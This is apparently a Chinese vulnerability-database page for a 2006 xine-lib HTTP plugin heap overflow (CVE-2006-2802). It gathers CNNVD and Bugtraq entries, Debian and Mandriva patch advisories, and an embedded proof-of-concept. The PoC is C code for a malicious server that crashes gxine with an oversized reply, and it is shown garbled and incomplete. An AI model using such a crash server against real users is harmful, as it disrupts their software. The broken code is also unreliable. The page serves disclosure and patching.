发布时间 :2006-06-03 06:02:00
修订时间 :2017-10-18 21:29:09

[原文]Buffer overflow in the HTTP Plugin ( for xine-lib 1.1.1 allows remote attackers to cause a denial of service (application crash) via a long reply from an HTTP server, as demonstrated using gxine 0.5.6.

[CNNVD]xine-lib 堆溢出漏洞(CNNVD-200606-085)

        xine-lib的xineplug_inp_http.so插件在处理HTTP服务器的超长回复时存在堆溢出漏洞,远程攻击者可以诱骗用户打开到恶意站点的HTTP URL触发这个漏洞,导致使用该插件的应用程序崩溃。

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)


- OVAL (用于检测的技术细节)


- 官方数据库链接
(官方数据源) MITRE
(官方数据源) NVD
(官方数据源) CNNVD

- 其它链接及资源
(UNKNOWN)  BID  18187
(UNKNOWN)  XF  xinelib-xinepluginphttp-bo(26972)

- 漏洞信息

xine-lib 堆溢出漏洞
中危 缓冲区溢出
2006-06-03 00:00:00 2006-06-05 00:00:00
        xine-lib的xineplug_inp_http.so插件在处理HTTP服务器的超长回复时存在堆溢出漏洞,远程攻击者可以诱骗用户打开到恶意站点的HTTP URL触发这个漏洞,导致使用该插件的应用程序崩溃。

- 公告与补丁


- 漏洞信息 (1852)

gxine 0.5.6 (HTTP Plugin) Remote Buffer Overflow PoC (EDBID:1852)
linux dos
2006-05-30 Verified
0 Federico L. Bossi Bonin
N/A [点击下载]
// gxine - HTTP Plugin Remote Buffer Overflow PoC
// Federico L. Bossi Bonin
// fbossi[at]netcomm[dot]com[dot]ar

// TESTED on gxine 0.5.6

// 0xb78eccc7 in free () from /lib/tls/
// (gdb) backtrace
// #0  0xb78eccc7 in free () from /lib/tls/
// #1  0xb7438fc8 in ?? () from /usr/lib/xine/plugins/1.1.1/
// #2  0x41414141 in ?? ()
// #3  0xb7f42164 in ?? () from /usr/lib/
// #4  0x080b1810 in ?? ()
// #5  0xb7f0e635 in xine_open () from /usr/lib/
// #6  0xb7f3967f in ?? () from /usr/lib/
// #7  0x0877c084 in ?? ()
// #8  0x0930a931 in ?? ()
// #9  0x080880a2 in defs.3 ()
// #10 0xb0088478 in ?? ()
// #11 0x00000000 in ?? ()

#include <stdio.h>
#include <sys/types.h> 
#include <sys/socket.h>
#include <netinet/in.h>
#define PORT 81
#define LEN 9500

void shoot(int);

int main() {
struct sockaddr_in srv_addr, client;
int len,pid,sockfd,sock;

sockfd = socket(AF_INET, SOCK_STREAM, 0);

if (sockfd < 0) { 
perror("error socket()"); 
bzero((char *) &srv_addr, sizeof(srv_addr));
srv_addr.sin_family = AF_INET;
srv_addr.sin_addr.s_addr = INADDR_ANY;
srv_addr.sin_port = htons(PORT);

if (bind(sockfd, (struct sockaddr *) &srv_addr,sizeof(srv_addr)) < 0)  {
perror("error bind()");

printf("Listening on port %i\n",PORT);

len = sizeof(client);

while (1) {
sock = accept(sockfd, (struct sockaddr *) &client, &len);
if (sock < 0)  {
perror("error accept()");

pid = fork();
if (pid < 0)  {
if (pid == 0)  {
printf("Conection from %s\n",inet_ntoa(client.sin_addr));
else close(sock);
return 0;

void shoot (int sock) {
int i;
for (i=0 ; i < LEN ; i++) {


// [2006-05-30]

- 漏洞信息 (F48093)

Debian Linux Security Advisory 1105-1 (PacketStormID:F48093)
2006-07-09 00:00:00
advisory,remote,web,denial of service,overflow

Debian Security Advisory 1105-1 - Federico L. Bossi Bonin discovered a buffer overflow in the HTTP Plugin in xine-lib, the xine video/media player library, that could allow a remote attacker to cause a denial of service.

Hash: SHA1

- --------------------------------------------------------------------------
Debian Security Advisory DSA 1105-1                                       Martin Schulze
July 7th, 2006                
- --------------------------------------------------------------------------

Package        : xine-lib
Vulnerability  : buffer overflow
Problem type   : remote
Debian-specific: no
CVE ID         : CVE-2006-2802
BugTraq ID     : 18187
Debian Bug     : 369876

Federico L. Bossi Bonin discovered a buffer overflow in the HTTP
Plugin in xine-lib, the xine video/media player library, taht could
allow a remote attacker to cause a denial of service.

For the old stable distribution (woody) this problem has been fixed in
version 0.9.8-2woody5.

For the stable distribution (sarge) this problem has been fixed in
version 1.0.1-1sarge3.

For the unstable distribution (sid) this problem has been fixed in
version 1.1.1-2.

We recommend that you upgrade your libxine packages.

Upgrade Instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given at the end of this advisory:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.

Debian GNU/Linux 3.0 alias woody
- --------------------------------

  Source archives:
      Size/MD5 checksum:      761 113ef134a39e2f37bc6395dc2e43b538
      Size/MD5 checksum:     2339 194c32b8c93f5e85c873454412f63552
      Size/MD5 checksum:  1766178 d8fc9b30e15b50af8ab7552bbda7aeda

  Alpha architecture:
      Size/MD5 checksum:   261022 3314df47933eadc0af5b5cf4a36afdfe
      Size/MD5 checksum:   816024 897664eee06d09f43375f5320be1f17b

  ARM architecture:
      Size/MD5 checksum:   302960 9dee75c3d13aabb5e83978e0d75ec4ce
      Size/MD5 checksum:   671494 dafc6c14181802dd56c887583bbf5140

  Intel IA-32 architecture:
      Size/MD5 checksum:   260788 3a98e4d713d1c341fe69a717c8de0072
      Size/MD5 checksum:   807996 1dd6e453aa93c420a145dd5397ee99bd

  Intel IA-64 architecture:
      Size/MD5 checksum:   260864 46ae5bb7b3256421dd7291e7c8898369
      Size/MD5 checksum:   953654 887b267a44c50e00f8bf9e2190852ca8

  HP Precision architecture:
      Size/MD5 checksum:   260968 aa1ee745d7c5c6b9a8271c64f0a587a0
      Size/MD5 checksum:   846792 60ed39365a0c67db2d4fba67d2ba1583

  Motorola 680x0 architecture:
      Size/MD5 checksum:   292718 2a87b508bcc610a01abf8c9c3773d40d
      Size/MD5 checksum:   617706 67075fef400071473fa948e5dd89b8fc

  Big endian MIPS architecture:
      Size/MD5 checksum:   299478 5b0c49b3745472f71725dd052b60d712
      Size/MD5 checksum:   653086 0044bef2d6ebeb01385d1a20a716046a

  Little endian MIPS architecture:
      Size/MD5 checksum:   299568 79851707d297d94d74b613d5abaa6b3a
      Size/MD5 checksum:   655030 0868f2d006c6b5282c8880a8460fed77

  PowerPC architecture:
      Size/MD5 checksum:   261278 fc16e5e2889afdd2c73491714575d53f
      Size/MD5 checksum:   742454 6c2be22417b910c45c0bb113a4f7707b

  IBM S/390 architecture:
      Size/MD5 checksum:   302404 9d54d7d12b431358f99fe688e2999cb5
      Size/MD5 checksum:   662920 5da8cbae8d02f579e8150dde1b07c4f8

  Sun Sparc architecture:
      Size/MD5 checksum:   261104 30717fe03e13e5dfbd5adbf4dafd93eb
      Size/MD5 checksum:   803816 fe08139ea1b35f3e7d5b7bcb8de20dd3

Debian GNU/Linux 3.1 alias sarge
- --------------------------------

  Source archives:
      Size/MD5 checksum:     1062 998afa8ddece7f06aac69cb8787b8bea
      Size/MD5 checksum:     3230 6b65bdac09c698d6dcfc9c01f417714b
      Size/MD5 checksum:  7774954 9be804b337c6c3a2e202c5a7237cb0f8

  Alpha architecture:
      Size/MD5 checksum:   107646 53ba83cd587bed30cdbd5dd96a241e43
      Size/MD5 checksum:  4829370 83e8d3ed71f20b06d4edcd1a97247903

  AMD64 architecture:
      Size/MD5 checksum:   107640 9be42e567a232db85ade634a8875cea1
      Size/MD5 checksum:  3933392 03aaaf4b88fd5cc99ab7048e386a81eb

  ARM architecture:
      Size/MD5 checksum:   107698 857f520bcc947238b6a1732239508e29
      Size/MD5 checksum:  3878442 e505d7fd20cff3d6965e0e55640e5da0

  Intel IA-32 architecture:
      Size/MD5 checksum:   107702 56fb77a0b6f0d01b3eb7cff160b7fc2e
      Size/MD5 checksum:  4204886 3fb1c5b93a8bd2857f8da12f95a0c144

  Intel IA-64 architecture:
      Size/MD5 checksum:   107648 e5540cc5bbe66e9565fc412d7d37a23d
      Size/MD5 checksum:  5620728 800474cd0356d391f8ac843104de8057

  HP Precision architecture:
      Size/MD5 checksum:   107676 8f22e952357456fe6f92217a6305a54b
      Size/MD5 checksum:  3600400 aff888a7efd1cc00072cc3bdd1c88a70

  Motorola 680x0 architecture:
      Size/MD5 checksum:   107720 97d1027b157b256611e234ce20c76337
      Size/MD5 checksum:  3175260 ee6cef5deb75f0396b13013602f30b90

  Big endian MIPS architecture:
      Size/MD5 checksum:   107654 639d0ee2c65047864b5c726dfba30fcf
      Size/MD5 checksum:  4066606 b7beb0cb4615f6ca98b4fbff3be16c06

  Little endian MIPS architecture:
      Size/MD5 checksum:   107678 ba9bb94702fcf451db6dde218e23bc21
      Size/MD5 checksum:  4125476 fc4b6816829beff3ba2fbd175e7e1384

  PowerPC architecture:
      Size/MD5 checksum:   107686 0ce2a02a85fd72b5bb24213fc025f864
      Size/MD5 checksum:  4305544 68c2be929520c8a45439d36ef8d0a2ca

  IBM S/390 architecture:
      Size/MD5 checksum:   107652 63c9659dc1e004412faf09d9feafee08
      Size/MD5 checksum:  3880838 b747276fe66ef57341430e10adc32fee

  Sun Sparc architecture:
      Size/MD5 checksum:   107666 045189d3cd49c72f4e4bf26ea391fec1
      Size/MD5 checksum:  4360438 15333a715e57287c63f2f2f36b40ec80

  These files will probably be moved into the stable distribution on
  its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb stable/updates main
For dpkg-ftp: dists/stable/updates/main
Mailing list:
Package info: `apt-cache show <pkg>' and<pkg>

Version: GnuPG v1.4.3 (GNU/Linux)



- 漏洞信息 (F47745)

Mandriva Linux Security Advisory 2006.108 (PacketStormID:F47745)
2006-06-27 00:00:00
advisory,remote,web,denial of service,overflow

Mandriva Linux Security Advisory MDKSA-2006-108 - A buffer overflow in the HTTP Plugin ( for xine-lib 1.1.1 allows remote attackers to cause a denial of service (application crash) via a long reply from an HTTP server, as demonstrated using gxine 0.5.6.

Hash: SHA1

 Mandriva Linux Security Advisory                         MDKSA-2006:108
 Package : xine-lib
 Date    : June 20, 2006
 Affected: 10.2, 2006.0, Corporate 3.0
 Problem Description:
 A buffer overflow in the HTTP Plugin ( for xine-lib 
 1.1.1 allows remote attackers to cause a denial of service (application 
 crash) via a long reply from an HTTP server, as demonstrated using gxine 
 0.5.6. (CVE-2006-2802)
 In addition, a possible buffer overflow exists in the AVI demuxer,
 similar in nature to CVE-2006-1502 for MPlayer. The Corporate 3 release
 of xine-lib does not have this issue.
 The updated packages have been patched to correct these issues.

 Updated Packages:
 Mandriva Linux 10.2:
 d681a8b19b18a2dc5452e7df07e83e3f  10.2/RPMS/libxine1-1.0-8.3.102mdk.i586.rpm
 fff9e7c0837d2231a6e3b2654f383e9d  10.2/RPMS/libxine1-devel-1.0-8.3.102mdk.i586.rpm
 7e92134803618e43514f24b3709b4c55  10.2/RPMS/xine-aa-1.0-8.3.102mdk.i586.rpm
 0ced315ae520ab8530e577d80b618bf3  10.2/RPMS/xine-arts-1.0-8.3.102mdk.i586.rpm
 7e5c2fe58c56877e0b58e77c61f7a600  10.2/RPMS/xine-dxr3-1.0-8.3.102mdk.i586.rpm
 2c16e0b8e7bb0d481f834fcf90749c66  10.2/RPMS/xine-esd-1.0-8.3.102mdk.i586.rpm
 473b446c63ea1a698f82465925161c63  10.2/RPMS/xine-flac-1.0-8.3.102mdk.i586.rpm
 07709eec2ca1e86350f966122752c175  10.2/RPMS/xine-gnomevfs-1.0-8.3.102mdk.i586.rpm
 63a0d2f3244334e66e36b267100bd7b5  10.2/RPMS/xine-plugins-1.0-8.3.102mdk.i586.rpm
 17c00929f7ae10ba2c7ebe8460396c6b  10.2/RPMS/xine-polyp-1.0-8.3.102mdk.i586.rpm
 6d8bda0b35bb615d458053a5489f4e8e  10.2/RPMS/xine-smb-1.0-8.3.102mdk.i586.rpm
 5efc378a2f15f33f080d938d27100861  10.2/SRPMS/xine-lib-1.0-8.3.102mdk.src.rpm

 Mandriva Linux 10.2/X86_64:
 4d21ed79acf486e861842133747594ae  x86_64/10.2/RPMS/lib64xine1-1.0-8.3.102mdk.x86_64.rpm
 20132d26d3a57c55992fe580333f74fe  x86_64/10.2/RPMS/lib64xine1-devel-1.0-8.3.102mdk.x86_64.rpm
 13bf0e99dbb3e4ec88848dfd59e6961f  x86_64/10.2/RPMS/xine-aa-1.0-8.3.102mdk.x86_64.rpm
 78cf2f4087c17f330499b5448e502865  x86_64/10.2/RPMS/xine-arts-1.0-8.3.102mdk.x86_64.rpm
 c1c17f1c4373837dff5d22b3cf2391ce  x86_64/10.2/RPMS/xine-dxr3-1.0-8.3.102mdk.x86_64.rpm
 3aa27fd3bd5817d1fc75410dd0508aef  x86_64/10.2/RPMS/xine-esd-1.0-8.3.102mdk.x86_64.rpm
 6156eb751055ec1b6f2f6a578d7dff12  x86_64/10.2/RPMS/xine-flac-1.0-8.3.102mdk.x86_64.rpm
 0e8c7357b1ab03f5f117e4033b4e5d77  x86_64/10.2/RPMS/xine-gnomevfs-1.0-8.3.102mdk.x86_64.rpm
 6f9cf73474c200b3d50e48b53a3fd5f6  x86_64/10.2/RPMS/xine-plugins-1.0-8.3.102mdk.x86_64.rpm
 3a8520e98e7acdf6f30dda1b12f76664  x86_64/10.2/RPMS/xine-polyp-1.0-8.3.102mdk.x86_64.rpm
 8de73b5ea3c73607138581175e0670c1  x86_64/10.2/RPMS/xine-smb-1.0-8.3.102mdk.x86_64.rpm
 5efc378a2f15f33f080d938d27100861  x86_64/10.2/SRPMS/xine-lib-1.0-8.3.102mdk.src.rpm

 Mandriva Linux 2006.0:
 904b1e86d75ee4bfa8281502b8d8dd60  2006.0/RPMS/libxine1-1.1.0-9.3.20060mdk.i586.rpm
 ddae938ae14b61dc19311e3b1c43c732  2006.0/RPMS/libxine1-devel-1.1.0-9.3.20060mdk.i586.rpm
 52d14f097de9909ae7fa7cb4cc079a69  2006.0/RPMS/xine-aa-1.1.0-9.3.20060mdk.i586.rpm
 723156ddabd5ee3f88693e578d96e56d  2006.0/RPMS/xine-arts-1.1.0-9.3.20060mdk.i586.rpm
 5f28c1bc6bf0688c6ecb260e00531846  2006.0/RPMS/xine-dxr3-1.1.0-9.3.20060mdk.i586.rpm
 84dd3acde96126f2b6f0146a0a24dade  2006.0/RPMS/xine-esd-1.1.0-9.3.20060mdk.i586.rpm
 3d216fdcc4bd0c0e768b6d779a0e1d49  2006.0/RPMS/xine-flac-1.1.0-9.3.20060mdk.i586.rpm
 3a62513a70e360c38f3c82ea2d3e7310  2006.0/RPMS/xine-gnomevfs-1.1.0-9.3.20060mdk.i586.rpm
 7e044bd1b04ee2531f5f5cd4fe7daad3  2006.0/RPMS/xine-image-1.1.0-9.3.20060mdk.i586.rpm
 d75c1fcc21a53f88c5abe88497968421  2006.0/RPMS/xine-plugins-1.1.0-9.3.20060mdk.i586.rpm
 dabedf3272f152fb60bb5a413050c7e0  2006.0/RPMS/xine-polyp-1.1.0-9.3.20060mdk.i586.rpm
 e1885c8818bafdd885f96eaf8c12ef7f  2006.0/RPMS/xine-smb-1.1.0-9.3.20060mdk.i586.rpm
 ff8503a1b8087bc9181f07678438553d  2006.0/SRPMS/xine-lib-1.1.0-9.3.20060mdk.src.rpm

 Mandriva Linux 2006.0/X86_64:
 bfe9c3b5b5df347001df5cfd0bb2f644  x86_64/2006.0/RPMS/lib64xine1-1.1.0-9.3.20060mdk.x86_64.rpm
 94d8aa7a860ba4aa93f655c09ad1c366  x86_64/2006.0/RPMS/lib64xine1-devel-1.1.0-9.3.20060mdk.x86_64.rpm
 0a4c15b7e94af988af673273e8258328  x86_64/2006.0/RPMS/xine-aa-1.1.0-9.3.20060mdk.x86_64.rpm
 299d73e1d222b28c1c2901896e2507ed  x86_64/2006.0/RPMS/xine-arts-1.1.0-9.3.20060mdk.x86_64.rpm
 26add5380db72a42ef9bd67508f48dad  x86_64/2006.0/RPMS/xine-dxr3-1.1.0-9.3.20060mdk.x86_64.rpm
 51cb6ba50f28b1868691460376639a6c  x86_64/2006.0/RPMS/xine-esd-1.1.0-9.3.20060mdk.x86_64.rpm
 e970668f572b7e7a62530b778b3fb493  x86_64/2006.0/RPMS/xine-flac-1.1.0-9.3.20060mdk.x86_64.rpm
 f5293bf40bd328e14c1291c68237b1d8  x86_64/2006.0/RPMS/xine-gnomevfs-1.1.0-9.3.20060mdk.x86_64.rpm
 537a00c6c9509a99d9112440dd49e7d1  x86_64/2006.0/RPMS/xine-image-1.1.0-9.3.20060mdk.x86_64.rpm
 8b752a25e5220b0a846a44f16789b7c9  x86_64/2006.0/RPMS/xine-plugins-1.1.0-9.3.20060mdk.x86_64.rpm
 b66deaeca87b2e72508e1ca72024f59e  x86_64/2006.0/RPMS/xine-polyp-1.1.0-9.3.20060mdk.x86_64.rpm
 e89abe16a92fc7fa2cafc9e0ab031ac5  x86_64/2006.0/RPMS/xine-smb-1.1.0-9.3.20060mdk.x86_64.rpm
 ff8503a1b8087bc9181f07678438553d  x86_64/2006.0/SRPMS/xine-lib-1.1.0-9.3.20060mdk.src.rpm

 Corporate 3.0:
 66d0662ba00565b4476925a9902d0f9a  corporate/3.0/RPMS/libxine1-1-0.rc3.6.9.C30mdk.i586.rpm
 2a084d80fe44d600fe0e609cde830539  corporate/3.0/RPMS/libxine1-devel-1-0.rc3.6.9.C30mdk.i586.rpm
 b57f175e35f525f6b6b753823fc325d2  corporate/3.0/RPMS/xine-aa-1-0.rc3.6.9.C30mdk.i586.rpm
 e0d664e3fc1a2b8d99102e24c496a272  corporate/3.0/RPMS/xine-arts-1-0.rc3.6.9.C30mdk.i586.rpm
 38c038ef6e7d075308c4a2611b3f584c  corporate/3.0/RPMS/xine-dxr3-1-0.rc3.6.9.C30mdk.i586.rpm
 6afecd5f975522201bec5646fbd2ae21  corporate/3.0/RPMS/xine-esd-1-0.rc3.6.9.C30mdk.i586.rpm
 c8895ac5be58e07ed8cd15cd81e350e6  corporate/3.0/RPMS/xine-flac-1-0.rc3.6.9.C30mdk.i586.rpm
 c255ed0880402fe216f217056c9672ea  corporate/3.0/RPMS/xine-gnomevfs-1-0.rc3.6.9.C30mdk.i586.rpm
 b61bb1c61c95522f1dd5757fa3bd4a71  corporate/3.0/RPMS/xine-plugins-1-0.rc3.6.9.C30mdk.i586.rpm
 d0a1c45466bb122ec7e4fb9caefa2cad  corporate/3.0/SRPMS/xine-lib-1-0.rc3.6.9.C30mdk.src.rpm

 Corporate 3.0/X86_64:
 6b61bb4adaf12bcbf3b0a499321eaad0  x86_64/corporate/3.0/RPMS/lib64xine1-1-0.rc3.6.9.C30mdk.x86_64.rpm
 de9ab25205ea761b93a80167a580f833  x86_64/corporate/3.0/RPMS/lib64xine1-devel-1-0.rc3.6.9.C30mdk.x86_64.rpm
 21cff9416555046fbb635597c21488ee  x86_64/corporate/3.0/RPMS/xine-aa-1-0.rc3.6.9.C30mdk.x86_64.rpm
 ae45767a2cec62c5bd4881cfd6128679  x86_64/corporate/3.0/RPMS/xine-arts-1-0.rc3.6.9.C30mdk.x86_64.rpm
 b936148403fc056d0c6427de93dd43e9  x86_64/corporate/3.0/RPMS/xine-esd-1-0.rc3.6.9.C30mdk.x86_64.rpm
 077ef2b064905109f8dc9f0473fb92e2  x86_64/corporate/3.0/RPMS/xine-flac-1-0.rc3.6.9.C30mdk.x86_64.rpm
 0524630808f7398834e8234ddcbef63e  x86_64/corporate/3.0/RPMS/xine-gnomevfs-1-0.rc3.6.9.C30mdk.x86_64.rpm
 438c3ca4e2050d253d6d0108db150811  x86_64/corporate/3.0/RPMS/xine-plugins-1-0.rc3.6.9.C30mdk.x86_64.rpm
 d0a1c45466bb122ec7e4fb9caefa2cad  x86_64/corporate/3.0/SRPMS/xine-lib-1-0.rc3.6.9.C30mdk.src.rpm

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver 0x22458A98

 You can view other update advisories for Mandriva Linux at:

 If you want to report vulnerabilities, please contact


 Type Bits/KeyID     Date       User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
Version: GnuPG v1.4.2.2 (GNU/Linux)



- 漏洞信息

xine-lib HTTP Response Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

A remote overflow exists in xine-lib. The library fails to properly check bounds for HTTP responses resulting in a buffer overflow. By tricking a victim into opening an HTTP link to a malicious website, an attacker can cause arbitary code execution on the victim\'s system resulting in a loss of integrity.

- 时间线

2006-05-30 Unknow
2006-05-30 Unknow

- 解决方案

Upgrade to cvs version (after 2006-05-31) or version 1.1.2 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

- 漏洞信息

Xine-Lib HTTP Response Buffer Overflow Vulnerability
Boundary Condition Error 18187
Yes No
2006-05-31 12:00:00 2006-11-23 08:06:00
Federico L. Bossi Bonin <> discovered this issue.

- 受影响的程序版本

xine xine-lib 1.1.1
xine xine-lib 1.1
xine xine-lib 1.0.2
xine xine-lib 1.0.1
xine gxine 0.5.6
Ubuntu Ubuntu Linux 5.10 powerpc
Ubuntu Ubuntu Linux 5.10 i386
Ubuntu Ubuntu Linux 5.10 amd64
Ubuntu Ubuntu Linux 5.0 4 powerpc
Ubuntu Ubuntu Linux 5.0 4 i386
Ubuntu Ubuntu Linux 5.0 4 amd64
Ubuntu Ubuntu Linux 6.06 LTS powerpc
Ubuntu Ubuntu Linux 6.06 LTS i386
Ubuntu Ubuntu Linux 6.06 LTS amd64
SuSE SUSE Linux Enterprise Server 8
+ Linux kernel 2.4.21
+ Linux kernel 2.4.19
Slackware Linux 10.2
Slackware Linux -current
S.u.S.E. UnitedLinux 1.0
S.u.S.E. SuSE Linux Standard Server 8.0
S.u.S.E. SuSE Linux School Server for i386
S.u.S.E. SUSE LINUX Retail Solution 8.0
S.u.S.E. SuSE Linux Openexchange Server 4.0
S.u.S.E. SuSE Linux Open-Xchange 4.1
S.u.S.E. Open-Enterprise-Server 9.0
S.u.S.E. Open-Enterprise-Server 1
S.u.S.E. Office Server
S.u.S.E. Novell Linux Desktop 9.0
S.u.S.E. Novell Linux Desktop 1.0
S.u.S.E. Linux Professional 10.0 OSS
S.u.S.E. Linux Professional 10.0
S.u.S.E. Linux Professional 9.3 x86_64
S.u.S.E. Linux Professional 9.3
S.u.S.E. Linux Professional 9.2 x86_64
S.u.S.E. Linux Professional 9.2
S.u.S.E. Linux Professional 9.1 x86_64
S.u.S.E. Linux Professional 9.1
S.u.S.E. Linux Professional 10.1
S.u.S.E. Linux Personal 10.0 OSS
S.u.S.E. Linux Personal 9.3 x86_64
S.u.S.E. Linux Personal 9.3
S.u.S.E. Linux Personal 9.2 x86_64
S.u.S.E. Linux Personal 9.1
S.u.S.E. Linux Personal 10.1
S.u.S.E. Linux Openexchange Server
S.u.S.E. Linux Office Server
S.u.S.E. Linux Enterprise Server for S/390 9.0
S.u.S.E. Linux Enterprise Server for S/390
S.u.S.E. Linux Desktop 1.0
S.u.S.E. Linux Database Server 0
Mandriva Linux Mandrake 2006.0 x86_64
Mandriva Linux Mandrake 2006.0
Mandriva Linux Mandrake 10.2 x86_64
Mandriva Linux Mandrake 10.2
MandrakeSoft Corporate Server 3.0 x86_64
MandrakeSoft Corporate Server 3.0
Gentoo Linux
Debian Linux 3.1 sparc
Debian Linux 3.1 s/390
Debian Linux 3.1 ppc
Debian Linux 3.1 mipsel
Debian Linux 3.1 mips
Debian Linux 3.1 m68k
Debian Linux 3.1 ia-64
Debian Linux 3.1 ia-32
Debian Linux 3.1 hppa
Debian Linux 3.1 arm
Debian Linux 3.1 amd64
Debian Linux 3.1 alpha
Debian Linux 3.1
Debian Linux 3.0 sparc
Debian Linux 3.0 s/390
Debian Linux 3.0 ppc
Debian Linux 3.0 mipsel
Debian Linux 3.0 mips
Debian Linux 3.0 m68k
Debian Linux 3.0 ia-64
Debian Linux 3.0 ia-32
Debian Linux 3.0 hppa
Debian Linux 3.0 arm
Debian Linux 3.0 alpha
Debian Linux 3.0

- 漏洞讨论

The xine-lib library is susceptible to a buffer-overflow vulnerability. This issue is due to the software's failure to properly bounds-check user-supplied input data before copying it to an insufficiently sized memory buffer.

Successful exploits allow remote attackers to execute arbitrary machine code in the context of application using the affected library.

Versions of xine-lib greater than or equal to 1.0.1 are potentially affected by this issue, but information on specific affected versions is not currently available. Applications that use a vulnerable version of the library may also be affected. Version 0.5.6 of gxine is reportedly vulnerable to this issue.

- 漏洞利用

A proof-of-concept exploit that causes a crash in affected applications is available.

- 解决方案

Currently we are not aware of any official vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at:

Please see the referenced advisories for more information.

xine xine-lib 1.0.1

xine xine-lib 1.1

xine xine-lib 1.1.1

- 相关参考